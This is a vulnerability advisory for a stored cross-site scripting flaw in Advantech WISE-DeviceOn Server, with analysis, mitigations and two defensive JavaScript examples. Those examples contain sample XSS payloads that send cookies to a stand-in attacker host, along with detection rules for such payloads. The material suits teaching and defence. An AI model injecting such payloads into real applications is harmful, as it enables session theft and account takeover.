
CVE-2025-34260: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Advantech Co., Ltd. WISE-DeviceOn Server

Severity: Medium
Published: Fri Dec 05 2025 (12/05/2025, 17:15:44 UTC)
Source: CVE Database V5
Vendor/Project: Advantech Co., Ltd.
Product: WISE-DeviceOn Server

Description

Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/action/schedule endpoint. When an authenticated user adds a schedule to an existing task, the schedule name is stored and later rendered in schedule listings without HTML sanitation. An attacker can inject malicious script into the schedule name, which is then executed in the browser context of users who view or interact with the affected schedule, potentially enabling session compromise and unauthorized actions as the victim.

AI-Powered Analysis

Last updated: 12/05/2025, 17:47:48 UTC

Technical Analysis

CVE-2025-34260 is a stored cross-site scripting (XSS) vulnerability in Advantech Co., Ltd.'s WISE-DeviceOn Server, affecting versions prior to 5.4. The flaw is in the /rmm/v1/action/schedule endpoint, through which authenticated users add schedules to existing tasks. The schedule name is stored without validation and later rendered in schedule listings without output encoding, so an attacker holding valid credentials can store a name containing HTML and JavaScript that executes in the browser of any user who views or interacts with the listing (CWE-79). Running in the victim's session, the script can read whatever session material the page exposes, call the application's own API with the victim's privileges, or alter what the victim sees; because the payload is persistent, a single submission affects every user who opens the listing until the entry is removed. Exploitation requires an authenticated account on the attacker's side and a page view or interaction on the victim's. The CVSS 4.0 base score is 5.1 (medium): network attack vector, low attack complexity, low privileges required (an authenticated account), user interaction required. The page records no public exploit. The affected range stops at 5.4, so 5.4 or later should be treated as the fixing release, subject to confirmation against Advantech's advisory. The vulnerability affects the confidentiality and integrity of user sessions and can be a foothold for further compromise of the management platform.
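The rendering defect described above, as an added JavaScript example that is not Advantech's code: the listing markup, the record field names and the attacker string are all assumptions, since the page does not show the real template. It contrasts unencoded concatenation, which lets a stored name break out of the page, with context-aware HTML encoding, and includes a small check a reviewer can run on rendered output.

```javascript
// Added example, not Advantech code. The listing markup, the field names and the
// attacker string are assumptions; the real WISE-DeviceOn template is not on the page.

// Constructed attacker-supplied schedule name, as a version prior to 5.4 would
// store it after a POST to /rmm/v1/action/schedule.
const STORED_SCHEDULE = {
  id: 42,
  taskId: 7,
  name: '"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// VULNERABLE: the stored name is concatenated straight into HTML, once inside a
// double-quoted attribute and once in the element body. The leading "> closes the
// title attribute and the <td>, and the <img> that follows fires its onerror handler.
function renderRowVulnerable(s) {
  return `<tr data-id="${s.id}"><td title="${s.name}">${s.name}</td></tr>`;
}

// Encoder for the HTML body and double-quoted attribute contexts used above.
// Every character that can change HTML structure is replaced by an entity.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: every untrusted value is encoded for the context it lands in. The
// numeric id is encoded as well rather than trusted, in case its type ever changes.
function renderRowSafe(s) {
  const name = escapeHtml(s.name);
  return `<tr data-id="${escapeHtml(s.id)}"><td title="${name}">${name}</td></tr>`;
}

// Review check: does the rendered fragment contain any element the template
// itself does not emit? True means user data has become markup.
function containsForeignTag(html, allowed = ['tr', 'td']) {
  const tags = [...html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)].map((m) => m[1].toLowerCase());
  return tags.some((t) => !allowed.includes(t));
}

// Demonstration: the same stored record through both renderers.
const vulnerableRow = renderRowVulnerable(STORED_SCHEDULE);
const safeRow = renderRowSafe(STORED_SCHEDULE);
console.log('vulnerable output injects a tag:', containsForeignTag(vulnerableRow)); // true
console.log('hardened output injects a tag:  ', containsForeignTag(safeRow));       // false
console.log(safeRow);
```

The encoder covers the two contexts this template uses, HTML body and double-quoted attribute. If a schedule name is ever placed into a JavaScript string, a URL, or an unquoted attribute, that context needs its own encoding; HTML entity encoding alone does not make those positions safe.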

Potential Impact

For European organizations in industrial automation, manufacturing and critical infrastructure that run Advantech WISE-DeviceOn Server, this vulnerability is a moderate risk. A stored payload executes in the browser of whoever views the affected schedule, so an attacker with a low-privileged account can act with the rights of any administrator who opens the listing: any action the victim's role permits, such as modifying tasks and schedules on managed devices, becomes available. Because the platform is used for remote monitoring and management of industrial devices, such actions can translate into downtime or manipulation of OT equipment. The need for an authenticated account and for a victim to view the entry narrows the attack surface but does not remove it, particularly where many users share the platform or credential hygiene is weak. No public exploit is recorded, but a stored XSS payload of this kind is simple to craft once an account is in hand, so the absence should not be read as low likelihood. In interconnected IT/OT environments, a compromised management session is a plausible starting point for lateral movement.

Mitigation Recommendations

1. Upgrade WISE-DeviceOn Server to version 5.4 or later, the lower bound of the unaffected range in the description; confirm the fixing release against Advantech's advisory before relying on it.
2. Until the upgrade is applied, restrict the ability to add or modify schedules to the smallest set of trusted accounts, and review existing schedule names for markup that may already have been stored.
3. The root-cause fixes belong in the product: server-side validation of the schedule name (length and permitted character set) and context-aware output encoding of every user-supplied value rendered in the schedule listings. Operators cannot apply these to a vendor binary; ask Advantech to confirm that 5.4 includes both.
4. Monitor schedule creation and modification records for names containing markup characters, event-handler attributes or javascript: URIs, including URL- or entity-encoded forms, and for one account creating many schedules in a short period.
5. Enforce strong authentication, including multi-factor authentication (MFA), so that the authenticated-user precondition is harder to meet with stolen credentials.
6. Tell users what an attack looks like in practice: because a stored payload runs as soon as the listing is viewed, they cannot avoid it by being careful, so the useful instruction is to report unexpected prompts, redirects, logouts or changes to schedules immediately.
7. Track Advantech's advisories and apply updates as soon as they are released.
8. Segment the network so that the WISE-DeviceOn Server is reachable only from the management hosts that need it, and administer it from dedicated browser profiles or hosts rather than general-purpose workstations.
9. A web application firewall with rules for the affected endpoint can block obvious payloads, but XSS filters are routinely bypassed through encoding or alternative syntax; treat a WAF as a compensating control alongside the upgrade, not as a replacement for it. Where the product allows it, also confirm that session cookies carry the HttpOnly and Secure attributes; this limits cookie theft, though it does not stop injected script from acting through the application's API inside the victim's session.
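A detection pass over schedule-creation records, matching the monitoring recommendation above, as an added example that is neither the product's logging nor any vendor rule. The JSON-lines audit format and its field names are assumptions; WISE-DeviceOn's real logs may record the request differently, and an ordinary access log will not contain the POST body at all, so the name has to come from an application audit trail or a proxy that logs bodies. The sample lines are constructed. The detector decodes URL and HTML-entity encodings before matching so that encoded payloads are not missed.

```javascript
// Added detection example, not Advantech's product or log format. The JSON-lines
// audit layout below is an ASSUMPTION; adapt the field names to what the deployed
// server or reverse proxy actually records.

// Constructed sample, not real traffic: one record per /rmm/v1/action/schedule request.
const SAMPLE_LOG = [
  '{"ts":"2025-12-05T17:20:01Z","user":"ops_a","method":"POST","path":"/rmm/v1/action/schedule","body":{"taskId":7,"name":"Nightly backup"}}',
  '{"ts":"2025-12-05T17:21:44Z","user":"contractor_x","method":"POST","path":"/rmm/v1/action/schedule","body":{"taskId":7,"name":"<script>new Image().src=\'https://attacker.example/?c=\'+document.cookie</script>"}}',
  '{"ts":"2025-12-05T17:22:10Z","user":"contractor_x","method":"POST","path":"/rmm/v1/action/schedule","body":{"taskId":7,"name":"%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"}}',
  '{"ts":"2025-12-05T17:23:02Z","user":"ops_b","method":"GET","path":"/rmm/v1/action/schedule","body":null}',
  '{"ts":"2025-12-05T17:23:30Z","user":"ops_b","method":"POST","path":"/rmm/v1/action/schedule","body":{"taskId":9,"name":"Week 3 &amp; 4 maintenance"}}',
  'not json at all',
];

const HTML_ENTITIES = { lt: '<', gt: '>', quot: '"', amp: '&', apos: "'" };

// Decode named and numeric HTML entities so that "&lt;script&gt;" is seen as "<script>".
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, e) => {
    if (e[0] === '#') {
      const code = e[1].toLowerCase() === 'x' ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
      return Number.isFinite(code) ? String.fromCodePoint(code) : m;
    }
    return HTML_ENTITIES[e.toLowerCase()] ?? m;
  });
}

// Peel URL encoding and entity encoding, a few rounds deep, until the value is stable.
// Double-encoded payloads are a common way to slip past naive filters.
function normalize(value) {
  let cur = String(value);
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { next = cur; } // malformed % sequences
    next = decodeEntities(next);
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Indicators applied to the decoded schedule name. Plain "&" or "<" in prose
// does not trigger these; a tag start, an on*= handler or a javascript: URI does.
const RULES = [
  ['html-tag', /<\s*\/?\s*[a-z]/i],
  ['event-handler', /\bon[a-z]+\s*=/i],
  ['javascript-uri', /javascript\s*:/i],
];

// Returns one hit per suspicious POST to the schedule endpoint.
function findSuspiciousScheduleEvents(lines) {
  const hits = [];
  for (const line of lines) {
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip malformed lines
    if (rec.path !== '/rmm/v1/action/schedule' || rec.method !== 'POST') continue;
    const rawName = rec.body && rec.body.name;
    if (typeof rawName !== 'string') continue;
    const name = normalize(rawName);
    const reasons = RULES.filter(([, re]) => re.test(name)).map(([label]) => label);
    if (reasons.length) hits.push({ ts: rec.ts, user: rec.user, name, reasons });
  }
  return hits;
}

// Demonstration over the constructed sample: two hits, both from contractor_x.
for (const h of findSuspiciousScheduleEvents(SAMPLE_LOG)) {
  console.log(`${h.ts} ${h.user} [${h.reasons.join(',')}] ${h.name}`);
}
```

The rules are deliberately narrow so that legitimate names with ampersands or angle brackets in prose do not page anyone; widen them only after checking the false-positive rate against real schedule names from the environment.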


Technical Details

Data Version: 5.2
Assigner Short Name: VulnCheck
Date Reserved: 2025-04-15T19:15:22.578Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 693316aef88dbe026cfdbe11

Added to database: 12/5/2025, 5:30:22 PM

Last enriched: 12/5/2025, 5:47:48 PM

Last updated: 12/8/2025, 3:50:56 AM